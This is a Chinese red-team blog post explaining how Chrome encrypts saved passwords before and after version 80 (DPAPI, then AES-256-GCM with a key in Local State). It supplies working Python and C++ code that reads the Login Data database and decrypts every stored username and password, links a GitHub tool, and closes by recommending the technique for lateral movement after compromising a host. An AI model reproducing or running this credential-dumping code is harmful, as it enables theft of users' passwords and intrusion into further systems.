前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >抓取Chrome所有版本密码

抓取Chrome所有版本密码

原创
作者头像
红队蓝军
发布2022-02-06 10:27:42
1.5K0
发布2022-02-06 10:27:42
举报
文章被收录于专栏:红队蓝军红队蓝军

工具已上传到github:https://github.com/SD-XD/Catch-Browser

谷歌浏览器存储密码的方式

在使用谷歌浏览器时,如果我们输入某个网站的账号密码,他会自动问我们是否要保存密码,以便下次登录的时候自动填写账号和密码

1.png
1.png

在设置中可以找到登录账户和密码

2.png
2.png

也可以直接看密码,不过需要凭证

3.png
3.png

这其实是windows的DPAPI机制

DPAPI

Data Protection Application Programming Interface(数据保护API)

DPAPI是Windows系统级对数据进行加解密的一种接口无需自实现加解密代码微软已经提供了经过验证的高质量加解密算法提供了用户态的接口对密钥的推导存储数据加解密实现透明并提供较高的安全保证

DPAPI提供了两个用户态接口CryptProtectData加密数据CryptUnprotectData解密数据加密后的数据由应用程序负责安全存储应用无需解析加密后的数据格式。但是加密后的数据存储需要一定的机制因为该数据可以被其他任何进程用来解密当然CryptProtectData也提供了用户输入额外数据来参与对用户数据进行加密的参数但依然无法放于暴力破解。

微软提供了两个接口用来加密和解密,CryptProtectMemoryCryptUnprotectMemory

实际上,在老版本(80之前)的谷歌浏览器,仅仅是使用了CryptProtectMemory来对密码进行加密

80版本之前的Chrome

实验环境

  • win7
  • Chrome版本 79.0.3945.117

实验过程

chrome的密码经过加密后存储在

代码语言:txt
复制
%LocalAppData%\Google\Chrome\User Data\Default\Login Data

如果用二进制文本编辑器查看的化会发现他其实是一个sqlite数据库文件

4.png
4.png

可以使用工具SQLiteStudio打开他

双击logins

5.png
5.png

选择data

6.png
6.png

可以看到有用户名和网址,却没有密码

但是密码的二进制实际是有值的

7.png
7.png

编写脚本解密

python的解密是最简洁的,这里送上一个三好学生的代码

代码语言:python
复制
from os import getenv
import sqlite3
import win32crypt
import binascii
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
    if password:
        print 'Site: ' + result[0]
        print 'Username: ' + result[1]
        print 'Password: ' + password
    else:
        print "no password found"

但我还是想c++写一个

编写之前,需要配置sqlite3环境,并且下载<sqlite3.h><sqlite3.c>文件

如果当前用户正在使用谷歌,是无法打开数据库的,于是我们可以复制一份出来操作

8.png
8.png

再通过sql语句查找logins表

9.png
9.png

在回调函数中解密

10.png
10.png

看下效果,完美解出密码

11.png
11.png

与谷歌浏览器上面看到的也是一样的,无需再验证用户密码

12.png
12.png

80版本之后的Chrome

那么80.x之后的Chrome如何解密呢

实验环境

  • win10
  • Chrome版本 91.0.4472.101(最新版)

实验分析

先看一下跟以前版本的Chrome存储方式上有什么区别

13.png
13.png
14.png
14.png

判断是否是新版本的Chrome加密其实就是看它加密后值的前面有没有v10或者v11

看官方文档,分析新版加密算法

key的初始化

https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_win.cc;l=192;drc=f59fc2f1cf0efae49ea96f9070bead4991f53fea

15.png
15.png
16.png
16.png

注释:尝试从local state提取密钥。

并且可以看到kDPAPIKeyPrefix实际上就是一个字符串"DPAPI"

17.png
17.png

然后就是进行DPAPI的解密,最后就是如果key不在local state中或者DPAPI解密失败,就重新生成一个key

从这里我们我可以大致分析出key初始化时的动作:

  1. 从local state文件中提取key
  2. base64解密key
  3. 去除key开头的“DPAPI”
  4. DPAPI解密,得到最终的key

跟进GetString函数的参数kOsCryptEncryptedKeyPrefName

18.png
18.png

知道key存放在local state文件os_crypt.encrypted_key字段中,即

19.png
19.png

而local state文件就在本地默认目录:

代码语言:txt
复制
%LocalAppData%\Google\Chrome\User Data\Local State

Local State是一个JSON格式的文件

明文加密方式

看源码注释

20.png
20.png

密钥加密后数据前缀是“v10”

21.png
21.png

密钥和NONCE/IV的长度分别为:32字节和12字节

22.png
22.png

这里解释一下NONCE/IV是什么:

如果我们不希望相同的明文通过密钥加密出来的密文是相同的(这样很容易让攻击者知道这两条密文的明文是相同的) 解决办法是使用IV(初始向量)或nonce(只使用一次的数值)。因为对于每条加密消息,我们都可以使用不同的byte字符串。它们是非确定理论的起源,而这种理论要求制造出令人难以分辨的副本。这些消息通常不是什么秘密,但为了解密需要,我们会在分发时对它们进行加密。 IV与nonce之间的区别是有争议的,但也不是没有关联的。不同的加密方案所保护的侧重点也不同:有些方案需要的只是密文不重复,这种情况我们通常叫作nonce;还有一些方案需要密文是随机的,甚至完全不可预测的,这种情况我们通常叫作IV。这里其实就是希望即便明文相同,经过加密后的密文也不相同。

再往下翻,其实可以看到解密函数

23.png
23.png

encrypted_value的前缀v10后为12字节的NONCE(IV),然后再是真正的密文。Chrome使用的是AES-256-GCM的AEAD对称加密、

那么思路就清晰了,这里我自己画了一个图来总结算法

24.png
24.png

实现自动化抓密码

解密使用一个非常强大的库,cryptopp

先获取原始的key

代码语言:c++
复制
string GetOriginalkey()
{
    string Decoded = "";
    //获取Local State中的未解密的key
    string key = "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADWXmStECIlTZZxWMAYf5UmAAAAAAIAAAAAABBmAAAAAQAAIAAAAP8V1h3J1qhEf8/h13hre+e3EMW0oD41Ux7UrEqls4DoAAAAAA6AAAAAAgAAIAAAAA7xXGgN1Hks1TbInimvYa0TnMfPa0jPpmlI9BDiUQAAMAAAAPzO7wya37iu97rDB4UTtn5QwQcuJkw2E3cw/tHuSnHdNv4qwXMWLC2oU3TkysoXmUAAAAAtPkLwNaInulyoGNH4GDxlwbzAW4DP7T8XWsZ/2QB0YrcLqxSNytHlV1qvVyO8D20Eu7jKqD/bMW2MzwEa40iF";
    StringSource((BYTE*)key.c_str(), key.size(), true, new Base64Decoder(new StringSink(Decoded)));
    key = Decoded;
    key = key.substr(5);//去除首位5个字符DPAPI
    Decoded.clear();//DPAPI解密
    int i;
    char result[1000] = "";
    DATA_BLOB DataOut = { 0 };
    DATA_BLOB DataVerify = { 0 };
    DataOut.pbData = (BYTE*)key.c_str();
    DataOut.cbData = 1000;
    if (!CryptUnprotectData(&DataOut, nullptr, NULL, NULL, NULL, 0, &DataVerify)) {
        printf("[!] Decryption failure: %d\n", GetLastError());
    }
    else {
        printf("[+] Decryption successfully!\n");
        for (i = 0; i < DataVerify.cbData; i++)
        {
            result[i] = DataVerify.pbData[i];
        }
    }
    return result;
}

如果当前chrome版本并不是80+,可以通过一个简单的判断:就是看加密密码前有没有”v10“或者”v11“

代码语言:c++
复制
string e_str = argv[2];
//判断密文是否包含v10或v11,如果包含则说明是80+的Chrome,用新的解密方法
if (strstr(e_str.c_str(), "v10") != NULL || strstr(e_str.c_str(), "v11") != NULL)
{
    NewDecrypt(argc, argv, azColName);
}
else {
    DecryptoByDPAPI(argv, azColName);
}
return 0;

然后就是解密密文

获取iv和密文

代码语言:c++
复制
//argv[2]是password_value的值
chiper = argv[2];
iv = argv[2];
iv = iv.substr(3, 15);  //获取iv的值
chiper = chiper.substr(15);   //加密密码的值

再用cyptopp强大的库函数进行解密

代码语言:c++
复制
//获取iv hex编码值
StringSource((BYTE*)iv.c_str(), iv.size(), true, new HexEncoder(new StringSink(Encoded)));
iv = Encoded;
Encoded.clear();
iv = iv.substr(0, iv.size() - 6);
CHAR Pass_Word[1000] = { 0 };
StringSource((BYTE*)iv.c_str(), iv.size(), true,new HexDecoder(new StringSink(Decoded))); 
iv = Decoded;
Decoded.clear();
char* key = GetOriginalkey();
d.SetKeyWithIV((BYTE*)key, 32, (BYTE*)iv.c_str(), iv.size());

StringSource(chiper, true,new AuthenticatedDecryptionFilter(d,new StringSink(password)));
for (int i = 0; i < password.size(); i++)
{
    Pass_Word[i] = password[i];
}
printf("%s = %s\n", azColName[0], argv[0] ? argv[0] : "NULL");
printf("%s = %s\n", azColName[1], argv[1] ? argv[1] : "NULL");
printf("%s = %s\n", azColName[2], Pass_Word);

这里逻辑的话参照上面分析步骤,这里就不再赘述

最后看看解密效果

25.png
25.png
26.png
26.png

后记

实战中如果拿到一台主机,并且安装有chrome,我们就可以抓取密码以便快速精确地横向。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 谷歌浏览器存储密码的方式
  • DPAPI
  • 80版本之前的Chrome
    • 实验环境
      • 实验过程
        • 编写脚本解密
        • 80版本之后的Chrome
          • 实验环境
            • 实验分析
              • 明文加密方式
              • 后记
              相关产品与服务
              数据保险箱
              数据保险箱(Cloud Data Coffer Service,CDCS)为您提供更高安全系数的企业核心数据存储服务。您可以通过自定义过期天数的方法删除数据,避免误删带来的损害,还可以将数据跨地域存储,防止一些不可抗因素导致的数据丢失。数据保险箱支持通过控制台、API 等多样化方式快速简单接入,实现海量数据的存储管理。您可以使用数据保险箱对文件数据进行上传、下载,最终实现数据的安全存储和提取。
              领券
              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档